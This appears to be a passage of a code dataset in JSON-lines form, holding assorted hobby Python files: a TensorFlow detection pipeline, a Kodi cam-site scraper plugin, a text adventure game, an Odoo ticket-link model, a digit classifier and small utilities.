constant_values=1e7)\n\n return _cls_target, _loc_target, _area\n\n # cls_target : shape = (objects, fh, fw, cls_num + 2)\n # reg_target : shape = (objects, fh, fw, 4 + 2)\n # area : shape = (objects, fh, fw)\n level_cls_target, level_reg_target, level_area = tf.map_fn(\n build_map_function_target,\n elems=[pos_x1, pos_y1, pos_x2, pos_y2, bboxes, classes],\n fn_output_signature=(tf.float32, tf.float32, tf.float32),\n )\n objects_mask = tf.reshape(level_cls_target[..., -1], (tf.shape(level_cls_target)[0], -1, 1))\n\n # min area : shape = (objects, fh, fw) --> (fh, fw)\n level_min_area_indices = tf.argmin(level_area, axis=0, output_type=tf.int32)\n # (fh, fw) --> (fh * fw)\n level_min_area_indices = tf.reshape(level_min_area_indices, (-1,))\n\n # (fw, ), (fh, )\n locs_x, locs_y = tf.range(0, fw), tf.range(0, fh)\n\n # (fh, fw) --> (fh * fw)\n locs_xx, locs_yy = tf.meshgrid(locs_x, locs_y)\n locs_xx = tf.reshape(locs_xx, (-1,))\n locs_yy = tf.reshape(locs_yy, (-1,))\n\n # (fh * fw, 3)\n level_indices = tf.stack((level_min_area_indices, locs_yy, locs_xx), axis=-1)\n\n \"\"\" Select \"\"\"\n level_cls_target = tf.gather_nd(level_cls_target, level_indices)\n level_reg_target = tf.gather_nd(level_reg_target, level_indices)\n level_min_area_indices = tf.expand_dims(\n tf.where(tf.equal(level_cls_target[..., -1], 1.), level_min_area_indices, -1),\n axis=-1)\n\n cls_target_ = tf.concat([cls_target_, level_cls_target], axis=0)\n reg_target_ = tf.concat([reg_target_, level_reg_target], axis=0)\n ind_target_ = tf.concat([ind_target_, level_min_area_indices], axis=0)\n mk_target_ = tf.concat([mk_target_, objects_mask], axis=1)\n\n # Shape: (anchor-points, cls_num + 2), (anchor-points, 4 + 2)\n return image, cls_target_, reg_target_, ind_target_, tf.shape(bboxes)[0][..., None], mk_target_\n\n\ndef inputs_targets_v1(image, bboxes, bboxes_count, fmaps_shape):\n inputs = {\n \"image\": image,\n \"bboxes\": bboxes,\n \"bboxes_count\": bboxes_count,\n \"fmaps_shape\": fmaps_shape,\n }\n return inputs\n\n\ndef inputs_targets_v2(image, cls_target, reg_target, ind_target, bboxes_cnt):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt\n }\n return inputs\n\n\ndef inputs_targets_v3(image, cls_target, reg_target, ind_target, bboxes_cnt, mask_target, ):\n inputs = {\n \"image\": image,\n \"cls_target\": cls_target,\n \"loc_target\": reg_target,\n \"ind_target\": ind_target,\n \"bboxes_cnt\": bboxes_cnt,\n \"mask_target\": mask_target,\n }\n return inputs\n\n\ndef _load_data_from_tfrecord(ds_name, path=\"D:/datasets/\"):\n if ds_name == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True)\n elif ds_name == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n elif ds_name == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\",\n split=[\"train\", \"test\"],\n data_dir=path,\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n return train, test, ds_info.splits[\"train\"].num_examples, ds_info.splits[\"test\"].num_examples\n\n\ndef create_pipeline_v1(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1):\n autotune = tf.data.AUTOTUNE\n\n train, test, train_num, test_num = _load_data_from_tfrecord(db)\n\n # if db == \"DPCB\":\n # (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"C:/works/datasets/\")\n # else:\n # train = None\n # test = None\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=_fmap_shapes(phi)),\n num_parallel_calls=autotune)\n train = train.shuffle(train_num)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0, 0), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.repeat().prefetch(autotune)\n return train, test\n\n\ndef create_pipeline_v2(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n _buffer = 1000\n\n if db == \"DPCB\":\n (train, test), ds_info = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True)\n elif db == \"VOC\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n elif db == \"VOC_mini\":\n (train, test), ds_info = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n with_info=True,\n shuffle_files=True)\n else:\n train, test, ds_info = None, None, None\n\n train_examples = ds_info.splits[\"train\"].num_examples\n test_examples = ds_info.splits[\"test\"].num_examples\n print(f\"[INFO] {db}: train( {train_examples} ), test( {test_examples} )\")\n\n train = train.map(preprocess_data_v2(\n phi=phi,\n mode=mode,\n fmap_shapes=_fmap_shapes(phi),\n debug=debug\n ), num_parallel_calls=autotune)\n\n train = (train.shuffle(_buffer, reshuffle_each_iteration=True).repeat())\n train = train.map(_compute_targets_v2, num_parallel_calls=autotune) # padded tensor.\n # train = train.batch(batch_size=batch_size, drop_remainder=True) # with _compute_targets_v1\n train = train.padded_batch(\n batch_size=batch_size,\n padding_values=(0., 0., 0., 0, 0, 0.),\n drop_remainder=True) # with _compute_targets_v2\n train = train.map(inputs_targets_v3, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n\n return train, test\n\n\ndef create_pipeline_test(phi=0, mode=\"ResNetV1\", db=\"DPCB\", batch_size=1, debug=False):\n autotune = tf.data.AUTOTUNE\n\n if db == \"DPCB\":\n (train, test) = tfds.load(name=\"dpcb_db\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\")\n\n elif db == \"VOC\":\n (train, test) = tfds.load(name=\"pascal_voc\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n elif db == \"VOC_mini\":\n (train, test) = tfds.load(name=\"pascal_voc_mini\", split=[\"train\", \"test\"], data_dir=\"D:/datasets/\",\n shuffle_files=True)\n\n else:\n train = None\n test = None\n\n feature_maps_shapes = _fmap_shapes(phi)\n\n train = train.map(preprocess_data_v1(phi=phi, mode=mode, fmap_shapes=feature_maps_shapes, max_bboxes=100,\n debug=debug), num_parallel_calls=autotune)\n\n train = train.shuffle(1000)\n train = train.padded_batch(batch_size=batch_size, padding_values=(0.0, 0.0, 0., 0.), drop_remainder=True)\n train = train.map(inputs_targets_v1, num_parallel_calls=autotune)\n train = train.prefetch(autotune)\n return train, test\n\n\nif __name__ == '__main__':\n eps = 10\n bs = 1\n\n train_t, test_t = create_pipeline_v2(\n phi=config.PHI,\n batch_size=bs,\n # debug=True,\n db=\"VOC\"\n )\n\n \"\"\" \"\"\"\n # for ep in range(eps):\n # for step, inputs_batch in enumerate(train_t):\n # # _cls = inputs_batch['cls_target'].numpy()\n # # _loc = inputs_batch['loc_target'].numpy()\n # # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n #\n # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {_int[:, 0]}\")\n #\n # if np.min(_int) == 0:\n # break\n #\n # # if step > (16551 // bs) - 3:\n # # min_cnt = np.min(_int)\n # # print(f\"Ep: {ep + 1}/{eps} - {step + 1}, Batch: {_int.shape[0]}, {min_cnt}\")\n\n \"\"\" \"\"\"\n\n # iterations = 1\n # for step, inputs_batch in enumerate(train_t):\n # # if (step + 1) > iterations:\n # # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _cls = inputs_batch['cls_target'].numpy()\n # _loc = inputs_batch['loc_target'].numpy()\n # _ind = inputs_batch['ind_target'].numpy()\n # _int = inputs_batch['bboxes_cnt'].numpy()\n # _mks = inputs_batch['mask_target'].numpy()\n #\n # if _int > 15:\n # break\n #\n # obj_cnt = _int[0, 0]\n # p7_mk = np.reshape(_cls[0, 8500:, -1], (5, 5))\n # p6_mk = np.reshape(_cls[0, 8400:8500, -1], (10, 10))\n # p5_mk = np.reshape(_cls[0, 8000:8400, -1], (20, 20))\n #\n # p7_mk_obj = np.reshape(_mks[0, :, 8500:, 0], (obj_cnt, 5, 5))\n # p6_mk_obj = np.reshape(_mks[0, :, 8400:8500, 0], (obj_cnt, 10, 10))\n # p5_mk_obj = np.reshape(_mks[0, :, 8000:8400, 0], (obj_cnt, 20, 20))\n #\n # p7_ap = np.reshape(_cls[0, 8500:, -2], (5, 5))\n # p6_ap = np.reshape(_cls[0, 8400:8500, -2], (10, 10))\n # p5_ap = np.reshape(_cls[0, 8000:8400, -2], (20, 20))\n #\n # p7_ind = np.reshape(_ind[0, 8500:], (5, 5))\n # p6_ind = np.reshape(_ind[0, 8400:8500], (10, 10))\n # p5_ind = np.reshape(_ind[0, 8000:8400], (20, 20))\n\n \"\"\" \"\"\"\n\n # import matplotlib.pyplot as plt\n #\n # iterations = 10\n # print('test')\n # plt.figure(figsize=(10, 8))\n # for step, inputs_batch in enumerate(train_t):\n # if (step + 1) > iterations:\n # break\n #\n # print(f\"[INFO] {step + 1} / {iterations}\")\n #\n # _images = inputs_batch['image'].numpy()\n # _bboxes = inputs_batch['bboxes'].numpy()\n # _scales = inputs_batch['bboxes_count'].numpy()\n # _images_shape = inputs_batch['fmaps_shape'].numpy()\n #\n # _bboxes = tf.stack(\n # [\n # _bboxes[..., 1],\n # _bboxes[..., 0],\n # _bboxes[..., 3],\n # _bboxes[..., 2],\n # ],\n # axis=-1\n # )\n #\n # colors = np.array([[255.0, 0.0, 0.0]])\n # _images = tf.image.draw_bounding_boxes(\n # _images,\n # _bboxes,\n # colors=colors\n # )\n #\n # for i in range(bs):\n # plt.subplot(2, 2, i + 1)\n # plt.imshow(_images[i].numpy().astype(\"uint8\"))\n # # print(bboxes[i])\n # plt.tight_layout()\n # plt.pause(1)\n # # plt.close()\n\n \"\"\" \"\"\"\n\n # tfds.benchmark(train_t, batch_size=bs)\n # tfds.benchmark(train_t, batch_size=bs)\n\n # image : (Batch, None, None, 3)\n # bboxes : (Batch, None, 5)\n # bboxes_count : (Batch, 1)\n # fmaps_shape : (Batch, 5, 2)\n","repo_name":"gogo12235LYH/keras-sapd-v2","sub_path":"generators/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":33825,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"9432759477","text":"import logging\r\n\r\nlogger = logging.Logger(name=\"APP\", level=logging.DEBUG)\r\n\r\nformatter = logging.Formatter(\"%(name)s:%(levelname)s: %(message)s\")\r\n\r\nconsole_handler = logging.StreamHandler()\r\nconsole_handler.setLevel(logging.CRITICAL)\r\nconsole_handler.setFormatter(formatter)\r\n\r\n\r\nfile_handler = logging.FileHandler(\"vkf.log\")\r\nfile_handler.setLevel(logging.DEBUG)\r\nfile_handler.setFormatter(formatter)\r\n\r\n\r\nlogger.addHandler(console_handler)\r\nlogger.addHandler(file_handler)\r\n","repo_name":"Saegl/vkf","sub_path":"vkf/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":478,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"32722464839","text":"# -*- coding: utf-8 -*-\n# Author: Lord Grey\n# Created : 01.03.2019\n# License: GPL v.3 https://www.gnu.org/copyleft/gpl.html\n\nimport re\nimport xbmcgui\nimport xbmcplugin\nimport resources.lib.helper as helper\n\n\ndef get_cats():\n\t\"\"\"\n\tcrawls the Catergorys from xvideos.com\n\tand returns them as a list of dicts\n\n\t[{'category': 'Pornos auf Deutsch', 'link': 'https://xvideos.com/lang/deutsch'},\n\t {'category': '3d', 'link': 'https://xvideos.com/?k=3d&top'}]\n\t\"\"\"\n\turl = 'https://chaturbate.com'\n\tcats = []\n\tsoup = helper.get_soup(url)\n\tul = soup.find(\"ul\", class_=\"sub-nav\")\n\n\tfor li in ul.find_all(\"li\"):\n\t\tcats.append(\n\t\t\tdict([\n\t\t\t\t('category', li.text),\n\t\t\t\t('link', url + li.a.get('href'))\n\t\t\t]))\n\n\treturn cats\n\n\ndef get_vids(url, category='none'):\n\t\"\"\"\n\tcrawls a given url form chaturbate.com for videos\n\tand returns them as a list of dicts\n\tif a catergory is given it will be added to the dict\n\n\ta returnd dict looks like this\n\t\t KEYS VALUE\n\t[{ 'title': 'BF HAVE 8 INC BUT YOUR ',\n\t\t'link': 'https://chaturbate.com/nasty_girl_masturbate',\n\t'duration': '5 min',\n\t 'thumb': 'https://img-hw.com/videos/thumbs169/a3/ed/36/a3ed367bcb5a69a9ad.14.jpg',\n\t\t 'res': '720p',\n\t 'views': '13k',\n\t'uploader': 'hans',\n\t'category': 'Grany'}]\n\t\"\"\"\n\n\thardcoded = 'https://chaturbate.com'\n\tvideo_info = []\n\tvideos = []\n\n\tsoup = helper.get_soup(url)\n\n\tvideos = soup.find_all(\"li\", class_=\"room_list_room\")\n\n\tfor info in videos:\n\t\tres = ''\n\t\ttitle = info.find(\"a\", href=True).get('href')[1:-1]\n\t\tuploader = info.find(\"a\", href=True).get('href')\n\t\timg = info.find(\"a\", href=True).find('img').get('src')\n\n\t\t# views and time are only seperatot bei \",\" on the site\n\t\tduraview = info.find(\"li\", class_=\"cams\").text.split(\",\")\n\t\tviews = duraview[1]\n\n\t\t# if duraview[0].find(\"h\") != -1: #\n\t\t# h = float(duraview[0][:-4])\n\t\t# duration = (h * 60) * 60\n\n\t\t# else:\n\t\t# duration = duraview[0][:-5] * 60\n\n\t\tvideo_info.append(\n\t\t\tdict([\n\t\t\t\t('title', title),\n\t\t\t\t('link', hardcoded + uploader),\n\t\t\t\t('duration', 0),\n\t\t\t\t('thumb', img),\n\t\t\t\t('res', res),\n\t\t\t\t('views', views),\n\t\t\t\t('uploader', title),\n\t\t\t\t('category', category)\n\t\t\t]))\n\treturn video_info\n\n\ndef play_video(_handle, video):\n\t\"\"\"\n\tPlay a video by the provided path.\n\n\t:param path: Fully-qualified video URL\n\t:type path: str\n\t\"\"\"\n\n\tsoup = helper.get_soup(video)\n\tpattern = r\"\"\"https.*\\.m3u8\"\"\"\n\tlink = re.findall(pattern, str(soup))[0].replace(r'\\u002D', '-')\n\n\t# Create a playable item with a path to play.\n\tplay_item = xbmcgui.ListItem(path=link)\n\n\t# Pass the item to the Kodi player.\n\txbmcplugin.setResolvedUrl(_handle, True, listitem=play_item)\n","repo_name":"Space2Walker/plugin.video.chaturbate","sub_path":"resources/lib/chaturbate.py","file_name":"chaturbate.py","file_ext":"py","file_size_in_byte":2591,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"34195573405","text":"rooms = {'1':{'name':'room1', 'description':'this is room one ', 'exit':{'east': '2', 'south': '4'}, 'invent':[]},\n '2':{'name':'room2', 'description':'this is room two ', 'exit':{'west': '1','east': '3','south': '5'}, 'invent':[]},\n '3':{'name':'room3', 'description':'this is room three ', 'exit':{'west': '2','south': '6'}, 'invent':[]},\n '4':{'name':'room4', 'description':'this is room four ', 'exit':{'north': '1','south': '7','east': '5'}, 'invent':['macbook']},\n '5':{'name':'room5', 'description':'this is room five ', 'exit':{'north': '2','south': '8','east': '6','west': '4'}, 'invent':['food']},\n '6':{'name':'room6', 'description':'this is room six ', 'exit':{'west': '5','south': '9','north': '3'}, 'invent':['botle']},\n '7':{'name':'room7', 'description':'this is room seven ', 'exit':{'north': '4','east': '8'}, 'invent':[]},\n '8':{'name':'room8', 'description':'this is room eight ', 'exit':{'north': '5','east': '9','west': '7'}, 'invent':['book']},\n '9':{'name':'room9', 'description':'this is room nine ', 'exit':{'north': '6', 'west': '8'}, 'invent':[]},\n }\n\n\n\nchar = {'position':'1', 'invent':['apple']}\n\n#1 2 3\n#4 5 6\n#7 8 9\n\n\ndef move(direction):\n global char\n position=char['position']\n room_id=rooms[position]['exit']\n if room_id.get(direction):\n char['position']=str(room_id.get(direction))\n describe_room()\n else:\n print(\"No such exit\")\n\n\ndef describe_room(arg=None):\n id=char['position']\n print(\"___________\\n|{0} \\n|Description: {1}\\n|Invents: {2}\\n___________\".format(rooms[id]['name'], rooms[id]['description'], rooms[id]['invent']))\n\n\ndef describe_pocket(arg=None):\n print(\"Your pocket has: {0}\".format(char['invent']))\n\n\ndef describe_handlers(arg=None):\n print(\"Handler list:\")\n for i in handlers.keys():\n print(\"- \" + i)\n\n\ndef describe_room_directions(arg=None):\n id = char['position']\n exits = rooms[id]['exit']\n for i in exits:\n room_id = exits[i]\n print(i, rooms[room_id]['name'])\n\n\ndef move_invent(move_from, move_to):\n if len(move_from) > 0:\n thing = str(input(\"What to take hare? \"))\n if thing in move_from:\n move_from.remove(thing)\n move_to.append(thing)\n return thing\n else:\n return False\n else:\n return False\n\n\ndef put(arg=None):\n movement=move_invent(char['invent'], rooms[char['position']]['invent'])\n if movement:\n print(\"You lef \" + movement + \" in this room\")\n else:\n print(\"You don't have it\")\n\n\ndef take(arg=None):\n movement=move_invent(rooms[char['position']]['invent'], char['invent'])\n if movement:\n print(\"You took \"+ movement + \" in this room\")\n else:\n print(\"No such thing in this room\")\n\n\nhandlers = {'list': describe_handlers,\n 'look_room': describe_room,\n 'look_pocket': describe_pocket,\n 'directions': describe_room_directions,\n 'put': put,\n 'take': take,\n 'west':move,\n 'east':move,\n 'north':move,\n 'south':move}\n\n\ndef main():\n describe_handlers()\n\n while True:\n command = input(\"Do your choice \")\n\n if len(command) != 0 and handlers.get(command.split()[0]):\n handlers[command.split()[0]](command)\n else:\n print(\"No such choice, please try something from list\")\n\nmain()\n","repo_name":"vprotsenko/python-","sub_path":"homework/lesson16/rooms.py","file_name":"rooms.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"16"} +{"seq_id":"14408654233","text":"from typing import List, Optional\nimport math\nimport numpy as np\n\nclass Solution:\n def maxProfit(self, prices: List[int]) -> int:\n if nums is None:\n return 0\n n = len(prices)\n if n == 1:\n return 0\n\n minprice = np.inf\n maxplus = 0\n for i in prices:\n if i < minprice:\n minprice = i\n continue\n\n if (i - minprice) > maxplus:\n maxplus = i - minprice\n\n return maxplus\n\nif __name__ == '__main__':\n nums = [7,1,5,3,6,4]\n nums = [7,6,4,3,1]\n res = Solution().maxProfit(prices=nums)\n print(res)","repo_name":"DaiJitao/algorithm","sub_path":"leetcode_china/demo121.py","file_name":"demo121.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"70193062410","text":"import itertools\nimport numpy as np\nimport pandas as pd\nimport evaluation as e\nimport read_dataset as rd\nfrom sklearn.pipeline import Pipeline\nfrom sklearn.neural_network import BernoulliRBM\nfrom sklearn.ensemble import RandomForestClassifier\n\ndef evaluate_parameters():\n X,y = get_train_data(limit=25)\n\n scores = []\n scores_std = []\n\n print('Start learning...')\n forests = [70]\n rbm_components = [1100]\n rbm_learning_rate = [0.06]\n rbm_n_iter = [20]\n\n it = itertools.product(forests,rbm_components,rbm_learning_rate,rbm_n_iter)\n\n for (trees,components,learning_rate,n_iter) in it:\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n name = \"plots_pipeline/pipeline_{}.png\".format(trees)\n e.evaluate_classifier(classifier,X,y, name=name)\n\ndef submission(trees=70,components=1100,learning_rate=0.06,n_iter=20):\n X,y,test_X = get_train_and_test_data()\n\n print(\"Defining classifiers\")\n classifier = get_classifier(trees,components,learning_rate,n_iter)\n print(\"Training classifier\")\n classifier.fit(X,y)\n predictions = classifier.predict(test_X)\n\n #Most submitions are cute with a CSV. Might as well learn how to do it.\n pd.DataFrame({\"ImageId\": range(1,len(predictions)+1), \"Label\": predictions}).to_csv('submit_rbm.csv', index=False, header=True)\n\ndef get_classifier(trees,components,learning_rate,n_iter):\n rbm = BernoulliRBM(verbose=True,n_components=components,\n n_iter=n_iter,learning_rate=learning_rate)\n random_forest = RandomForestClassifier(trees)\n return Pipeline(steps=[('rbm',rbm), ('forest',random_forest)])\n\ndef scale(X):\n return (X - np.min(X, 0)) / (np.max(X, 0) + 0.0001) # 0-1 scaling\n\ndef get_train_data(limit=-1):\n print('Loading train data')\n X,y = rd.read_train(limit=limit)\n print('Augmenting data set')\n X,y = rd.nudge_dataset(X,y)\n print('Scaling data')\n X = scale(X)\n return X,y\n\ndef get_train_and_test_data(train_limit=-1,test_limit=-1):\n X,y = get_train_data(train_limit)\n print('Loading test data')\n test_X = rd.read_test(limit=test_limit)\n test_X = scale(test_X)\n return X,y,test_X\n\n#evaluate_parameters()\nsubmission()\n","repo_name":"costapt/kaggle_digit_recognizer","sub_path":"rbm_with_random_forest.py","file_name":"rbm_with_random_forest.py","file_ext":"py","file_size_in_byte":2211,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"34384548400","text":"import string\n\nclass TemplateFormatter(string.Formatter):\n def get_field(self, field_name, args, kwargs):\n if field_name.startswith(\"$\"):\n code = field_name[1:]\n val = eval(code, {}, dict(kwargs))\n return val, field_name\n else:\n return super(TemplateFormatter, self).get_field(field_name, args, kwargs)\nmessages = ['Message 1', 'Message 2']\n\ntmpl = TemplateFormatter()\ntxt = tmpl.format(\"Hello {name}, \"\n \"You have {$len(messages)} message{$len(messages) and 's'}:\\n{$'\\\\n'.join(messages)}\",\n name='Alessandro', messages=messages)\nprint(txt)\n","repo_name":"PacktPublishing/Modern-Python-Standard-Library-Cookbook","sub_path":"Chapter02/text_04.py","file_name":"text_04.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":85,"dataset":"github-code","pt":"16"} +{"seq_id":"20800201828","text":"import tkinter\nimport CustomerLoginWindow\nimport colorfile\nfrom databases import StockDatabase, CustomerDatabase, StaffDatabase, BasketDatabase, OrderDatabase\nfrom staffViews.stockManager import StockManager\nfrom staffViews.staffManager import StaffManager\nfrom staffViews.custManager import CustomerManager\nfrom staffViews.orderManager import OrderManager\n\nclass StaffPortal:\n def __init__(self, db:StockDatabase.StockDatabase,customerdb:CustomerDatabase.CustomerDB,staffdb:StaffDatabase.StaffDB, bdb:BasketDatabase.BasketDatabase, odb:OrderDatabase.OrderDatabase, closeFn):\n #Public vars\n self.db = db\n self.customerdb = customerdb\n self.staffdb = staffdb\n self.basketdb = bdb\n self.orderdb = odb\n self.closeFn = closeFn\n #Window Builder\n self.root = tkinter.Toplevel()\n self.root.protocol(\"WM_DELETE_WINDOW\", self.HandleClose) #Captures the close event to close it properly\n self.root.title(\"BuildrightDB\")\n self.root.geometry(\"900x450\")\n self.DrawWidgets()\n\n self.root.mainloop()\n\n def DrawWidgets(self):\n #Header Frame\n self.headerFrame = tkinter.Frame(self.root, bg=colorfile.topbarcolor)\n self.headerFrame.place(x=0,y=0,width=900,height=64)\n self.titleLabel = tkinter.Label(self.headerFrame, text=\"Staff Portal\", font=\"default 32 normal\", anchor=\"w\", bg=colorfile.topbarcolor)\n self.titleLabel.place(x=8,y=8,width=400,height=48)\n\n #Stock Management\n self.stockViewButton = tkinter.Button(self.root, text=\"Stock Management\", command=lambda:self.ViewStock())\n self.stockViewButton.place(x=8,y=100,width=438,height=125)\n\n #Staff Management\n self.staffViewButton = tkinter.Button(self.root, text=\"Staff Management\", command=lambda:self.ViewStaff())\n self.staffViewButton.place(x=454,y=100,width=438,height=125)\n\n #Customer Management\n self.customerViewButton = tkinter.Button(self.root, text=\"Customer Management\", command=lambda:self.ViewCustomer())\n self.customerViewButton.place(x=8,y=233,width=438,height=125)\n\n #Order Management\n self.orderViewButton = tkinter.Button(self.root, text=\"Order Management\", command=lambda:self.ViewOrder())\n self.orderViewButton.place(x=454,y=233,width=438,height=125)\n\n def HandleClose(self):\n #print(\"Closing!\")\n self.root.quit()\n self.root.destroy()\n self.closeFn()\n\n def ViewStock(self):\n stockmm = StockManager.StockManager(self.db)\n\n def ViewStaff(self):\n staffm = StaffManager.StaffManager(self.staffdb)\n \n def ViewCustomer(self):\n cman = CustomerManager.CustomerManager(self.customerdb)\n\n def ViewOrder(self):\n oman = OrderManager.OrderManager(self.orderdb, self.customerdb, self.db)","repo_name":"jasonthehuman05/CompSciCoursework","sub_path":"CourseworkMainProgramming/StaffPortal.py","file_name":"StaffPortal.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"43681037952","text":"# -*- coding: utf-8 -*-\n\nfrom openerp import models, fields, api, _\n\n\nclass LinkType(models.Model):\n \"\"\"Type of a link.\n \"\"\"\n _name = 'anytracker.link.type'\n _description = \"Link type\"\n _order = 'name'\n\n name = fields.Char(\n _(\"name\"),\n size=64,\n required=True,\n translate=True)\n description = fields.Text(\n _('Description'),\n translate=True)\n\n\nclass Link(models.Model):\n \"\"\"The link is used to link 2 tickets.\n For example it is useful to link use case ticket with few technical ticket\n A ticket can be present in several links.\n \"\"\"\n _name = 'anytracker.link'\n _description = \"Link between two tickets\"\n\n @api.one\n @api.depends('ticket_two', 'ticket_one')\n @api.onchange('ticket_two', 'ticket_one')\n def _data_tickets(self):\n # This function is used for ticket view\n # to display the list of active ticket links\n # In the link, the active ticket can be ticket_one or ticket_two,\n # the goal is to display the ticket is not active ticket\n\n for link in self:\n if self.env.context.get('active_id'):\n active_id = self.env.context['active_id']\n if link.ticket_one:\n if link.ticket_one.id != active_id:\n link.name = link.ticket_one.name\n link.number = link.ticket_one.number\n link.stage = link.ticket_one.stage_id.name\n link.progress = link.ticket_one.progress\n\n if link.ticket_two:\n if link.ticket_two.id != active_id:\n link.name = link.ticket_two.name\n link.number = link.ticket_two.number\n link.stage = link.ticket_two.stage_id.name\n link.progress = link.ticket_two.progress\n else:\n link.name = False\n link.number = False\n link.stage = False\n link.progress = False\n\n ticket_one = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket one',\n required=True,\n ondelete='cascade')\n ticket_two = fields.Many2one(\n 'anytracker.ticket',\n 'Ticket two',\n required=True,\n ondelete='cascade')\n\n linktype_id = fields.Many2one(\n 'anytracker.link.type',\n 'Type Link',\n required=True,\n ondelete='cascade')\n name = fields.Char(compute='_data_tickets', string=\"\")\n number = fields.Char(compute='_data_tickets', string=\"\")\n progress = fields.Float(compute='_data_tickets', string=\"\")\n stage = fields.Char(compute='_data_tickets', string=\"\")\n\n @api.multi\n def name_get(self):\n \"\"\" set a displaying to better represent link between two tickets \"\"\"\n\n result = []\n\n for link in self:\n diaplay_value = \"{} <-> {}\".format(\n link.ticket_one.number, link.ticket_two.number)\n result.append((link.id, diaplay_value))\n\n return result\n\n def return_action_ticket(self):\n return {\n 'type': 'ir.actions.client',\n 'tag': 'reload',\n 'name': 'Ticket',\n 'res_model': 'anytracker.ticket',\n 'view_type': 'tree',\n 'view_mode': 'tree',\n 'target': 'current',\n 'nodestroy': True,\n }\n\n @api.multi\n def action_delete_link(self):\n # FIXME - Is there no verification to be done before deleting a link?\n self.unlink()\n return self.return_action_ticket()\n\n @api.multi\n def action_open_link(self):\n\n # This will make sure we have on record, not multiple records.\n self.ensure_one()\n\n return {\n 'name': self.name,\n 'res_model': 'anytracker.link',\n 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'context': {},\n 'view_mode': 'form',\n 'view_type': 'form',\n 'target': 'new',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n\nclass Ticket(models.Model):\n \"\"\" Add links\n \"\"\"\n _inherit = 'anytracker.ticket'\n\n @api.one\n def _getAllLink(self):\n LINK_MODEL = self.env['anytracker.link']\n for ticket in self:\n ticket.all_links = LINK_MODEL.search(\n ['|', ('ticket_two', '=', ticket.id),\n ('ticket_one', '=', ticket.id)])\n\n @api.multi\n def action_add_link(self):\n\n # This will make sure we have on record, not multiple records.\n self.ensure_one()\n\n # template = self.env.ref('account.email_template_edi_invoice', False)\n return {\n 'name': \"add new link\",\n 'res_model': 'anytracker.link',\n # 'res_id': self.id,\n 'type': 'ir.actions.act_window',\n 'view_mode': 'form',\n 'view_type': 'form',\n 'context': {'default_ticket_one': self.id},\n # 'view_id': self.env.ref('view_prod_order_form'),\n 'target': 'new', # 'target': 'current',\n 'flags': {'form': {'action_buttons': True}}\n\n }\n\n link_ids = fields.One2many(\n 'anytracker.link',\n 'ticket_one',\n 'Links',\n copy=True,\n help=\"The tickets linked to this tickets\")\n all_links = fields.One2many(\n 'anytracker.link',\n string=\"links\",\n compute='_getAllLink')\n","repo_name":"anybox/anytracker","sub_path":"anytracker/link/link.py","file_name":"link.py","file_ext":"py","file_size_in_byte":5450,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"40350522053","text":"\"\"\"\nThis is a test\n\"\"\"\n#-----------------------------------------------------------------------\nfrom tkinter import *\n#-----------------------------------------------------------------------\n\n# Window Declaration\nroot = Tk(className=\"Ben's Window\")\n\n# Button Functionality\ndef myClick():\n myClick = Label(root, text=\"!!!Poop Alert!!!\").pack()\n searchBox = Label(root, text=\"Input: \" + search.get()).pack()\n\n\n# Labels\nmyLabel = Label(root, text=\"Hello Ben!\")\nmyLabel2 = Label(root, text=\"I hope you are having a wonderful day!\")\n# Buttons\nmyButton = Button(root, text=\"Do Not Press!\", 